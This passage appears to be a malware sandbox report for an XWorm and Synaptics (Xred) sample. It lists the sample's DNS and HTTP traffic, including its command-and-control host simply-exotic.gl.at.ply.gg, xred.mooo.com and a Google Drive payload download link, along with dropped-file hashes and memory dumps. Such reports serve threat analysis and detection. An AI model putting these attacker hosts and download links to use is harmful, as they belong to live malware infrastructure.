      65.204.58.216.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      65.204.58.216.in-addr.arpa
      IN PTR
      Response
      65.204.58.216.in-addr.arpa
      IN PTR
      lhr48s49-in-f11e100net
      65.204.58.216.in-addr.arpa
      IN PTR
      lhr25s13-in-f1�G
      65.204.58.216.in-addr.arpa
      IN PTR
      lhr25s13-in-f65�G
    • 208.95.112.1:80
      http://ip-api.com/line/?fields=hosting
      http
      ._cache_Xworm.exe
      310 B
       267 B
       5
      2

      HTTP Request

      GET http://ip-api.com/line/?fields=hosting

      HTTP Response

      200
    • 69.42.215.252:80
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      http
      Synaptics.exe
      752 B
       415 B
       13
      4

      HTTP Request

      GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

      HTTP Response

      200
    • 147.185.221.25:27183
      simply-exotic.gl.at.ply.gg
      ._cache_Xworm.exe
      506 B
       250 B
       5
      5
    • 216.58.212.206:443
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      tls, http
      Synaptics.exe
      1.9kB
       11.3kB
       16
      13

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303
    • 142.250.187.227:80
      http://c.pki.goog/r/r1.crl
      http
      Synaptics.exe
      303 B
       1.7kB
       4
      4

      HTTP Request

      GET http://c.pki.goog/r/r1.crl

      HTTP Response

      200
    • 142.250.187.227:80
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj
      http
      Synaptics.exe
      736 B
       1.6kB
       6
      4

      HTTP Request

      GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0

      HTTP Response

      200

      HTTP Request

      GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj

      HTTP Response

      200
    • 216.58.204.65:443
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      tls, http
      Synaptics.exe
      2.4kB
       14.7kB
       23
      21

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404
    • 8.8.8.8:53
      58.55.71.13.in-addr.arpa
      dns
      70 B
       144 B
       1
      1

      DNS Request

      58.55.71.13.in-addr.arpa

    • 8.8.8.8:53
      73.159.190.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      73.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      3.108.50.23.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      3.108.50.23.in-addr.arpa

    • 8.8.8.8:53
      ip-api.com
      dns
      ._cache_Xworm.exe
      56 B
       72 B
       1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      46.28.109.52.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      46.28.109.52.in-addr.arpa

    • 8.8.8.8:53
      1.112.95.208.in-addr.arpa
      dns
      71 B
       95 B
       1
      1

      DNS Request

      1.112.95.208.in-addr.arpa

    • 8.8.8.8:53
      xred.mooo.com
      dns
      Synaptics.exe
      59 B
       118 B
       1
      1

      DNS Request

      xred.mooo.com

    • 8.8.8.8:53
      freedns.afraid.org
      dns
      Synaptics.exe
      64 B
       80 B
       1
      1

      DNS Request

      freedns.afraid.org

      DNS Response

      69.42.215.252

    • 224.0.0.251:5353
      57 B
       1
    • 8.8.8.8:53
      104.246.116.51.in-addr.arpa
      dns
      73 B
       159 B
       1
      1

      DNS Request

      104.246.116.51.in-addr.arpa

    • 8.8.8.8:53
      252.215.42.69.in-addr.arpa
      dns
      144 B
       144 B
       2
      2

      DNS Request

      252.215.42.69.in-addr.arpa

      DNS Request

      252.215.42.69.in-addr.arpa

    • 8.8.8.8:53
      simply-exotic.gl.at.ply.gg
      dns
      ._cache_Xworm.exe
      72 B
       88 B
       1
      1

      DNS Request

      simply-exotic.gl.at.ply.gg

      DNS Response

      147.185.221.25

    • 8.8.8.8:53
      25.221.185.147.in-addr.arpa
      dns
      73 B
       130 B
       1
      1

      DNS Request

      25.221.185.147.in-addr.arpa

    • 8.8.8.8:53
      241.150.49.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      241.150.49.20.in-addr.arpa

    • 8.8.8.8:53
      50.23.12.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      50.23.12.20.in-addr.arpa

    • 8.8.8.8:53
      77.190.18.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      77.190.18.2.in-addr.arpa

    • 8.8.8.8:53
      docs.google.com
      dns
      Synaptics.exe
      61 B
       77 B
       1
      1

      DNS Request

      docs.google.com

      DNS Response

      216.58.212.206

    • 8.8.8.8:53
      c.pki.goog
      dns
      Synaptics.exe
      56 B
       107 B
       1
      1

      DNS Request

      c.pki.goog

      DNS Response

      142.250.187.227

    • 8.8.8.8:53
      o.pki.goog
      dns
      Synaptics.exe
      56 B
       107 B
       1
      1

      DNS Request

      o.pki.goog

      DNS Response

      142.250.187.227

    • 8.8.8.8:53
      drive.usercontent.google.com
      dns
      Synaptics.exe
      74 B
       90 B
       1
      1

      DNS Request

      drive.usercontent.google.com

      DNS Response

      216.58.204.65

    • 8.8.8.8:53
      206.212.58.216.in-addr.arpa
      dns
      73 B
       173 B
       1
      1

      DNS Request

      206.212.58.216.in-addr.arpa

    • 8.8.8.8:53
      227.187.250.142.in-addr.arpa
      dns
      74 B
       112 B
       1
      1

      DNS Request

      227.187.250.142.in-addr.arpa

    • 8.8.8.8:53
      65.204.58.216.in-addr.arpa
      dns
      72 B
       169 B
       1
      1

      DNS Request

      65.204.58.216.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Synaptics\Synaptics.exe
      Filesize

      828KB

      MD5

      f2dba5b93fa78fe0357cae18d68bc13f

      SHA1

      686e5e1ae65116c4d22315b15992163ad4d34f7c

      SHA256

      0d8cc0a75238c05e1b072683ee43d7e0bf827dde7a652df1467333a2b1f6a570

      SHA512

      cc9714c48fc9c36f98ec2230e96efd5016c254059cf23ea7ccf318e3e44337559e6f5f48d5b9367a10c5b87bd05df6345c58c64eb728769f649b2411f4dc3970

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      6d42b6da621e8df5674e26b799c8e2aa

      SHA1

      ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

      SHA256

      5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

      SHA512

      53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      fd98baf5a9c30d41317663898985593b

      SHA1

      ea300b99f723d2429d75a6c40e0838bf60f17aad

      SHA256

      9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

      SHA512

      bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      ce4540390cc4841c8973eb5a3e9f4f7d

      SHA1

      2293f30a6f4c9538bc5b06606c10a50ab4ecef8e

      SHA256

      e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105

      SHA512

      2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\._cache_Xworm.exe
      Filesize

      75KB

      MD5

      f63d6c11422e7e0ca83981e8dae62f96

      SHA1

      c9c6088a764b07e7d438ad603a8bfcd9972f2b06

      SHA256

      7ed1b4c14c9dfc97094ac40c5fb6c1fe109e4bfcbc953f2ba4331686388be531

      SHA512

      b4dc1037a4fa38482e355aa3f4ac8288aa926dd7c24ee5cd260b5418ebd9ba6a53ef41f3e862eaa71795a2d0b7407fc9d700ec9a224d45f4b7af1e2063f991d9

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\29875E00
      Filesize

      25KB

      MD5

      dba0bd51160965c3b4ac787c1e7c02f0

      SHA1

      a54caa7444de8c41bb67dfb5a07f6b734845f9ad

      SHA256

      479b2759121bb3b6bf368c778f7832893063a0e3e8689d41bac57884d1bd5faf

      SHA512

      1966f1f8f54e519ea2a001b1bae46a80295c0de8773d06a1d3dfe21e940e6f8b221ffbb70bc3df884ba5b8a8ddfb7f999c4a19ec852362e476007944ab175c17

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\ZKcSdTQp.xlsm
      Filesize

      17KB

      MD5

      e566fc53051035e1e6fd0ed1823de0f9

      SHA1

      00bc96c48b98676ecd67e81a6f1d7754e4156044

      SHA256

      8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

      SHA512

      a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q0qkcbay.byz.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmpDAFE.tmp.bat
      Filesize

      165B

      MD5

      2df96a49e00dd3f3093d23e6bbb60ced

      SHA1

      777217aa6c138af0a4f148c49226e5b4e67fe896

      SHA256

      04e25e6a1dc75d0253924a2c5eb742524e7d7beb7da23b4bcf47eabe46b951d0

      SHA512

      69759b9fad4cac83c69de2613709c5f840dfc3acb28f8cb766385ab6f2b49a306190fe2568bbe458f8310c7b17045522c7c838c88b82c6e3ffedf6ce1fc958ff

      Download Submit

    • memory/532-304-0x00007FFFFDBF3000-0x00007FFFFDBF5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/532-77-0x00000000003E0000-0x00000000003FA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/532-307-0x000000001B100000-0x000000001B110000-memory.dmp

      Filesize

      64KB

      Download

    • memory/532-240-0x000000001B100000-0x000000001B110000-memory.dmp

      Filesize

      64KB

      Download

    • memory/532-70-0x00007FFFFDBF3000-0x00007FFFFDBF5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/844-247-0x0000022AA0330000-0x0000022AA0352000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4180-339-0x0000000000400000-0x00000000004D5000-memory.dmp

      Filesize

      852KB

      Download

    • memory/4180-306-0x0000000002140000-0x0000000002141000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4180-305-0x0000000000400000-0x00000000004D5000-memory.dmp

      Filesize

      852KB

      Download

    • memory/4180-131-0x0000000002140000-0x0000000002141000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4872-192-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4872-195-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4872-193-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4872-196-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4872-198-0x00007FF7DA1E0000-0x00007FF7DA1F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4872-194-0x00007FF7DC3B0000-0x00007FF7DC3C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4872-197-0x00007FF7DA1E0000-0x00007FF7DA1F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5092-130-0x0000000000400000-0x00000000004D5000-memory.dmp

      Filesize

      852KB

      Download

    • memory/5092-0-0x00000000006E0000-0x00000000006E1000-memory.dmp

      Filesize

      4KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.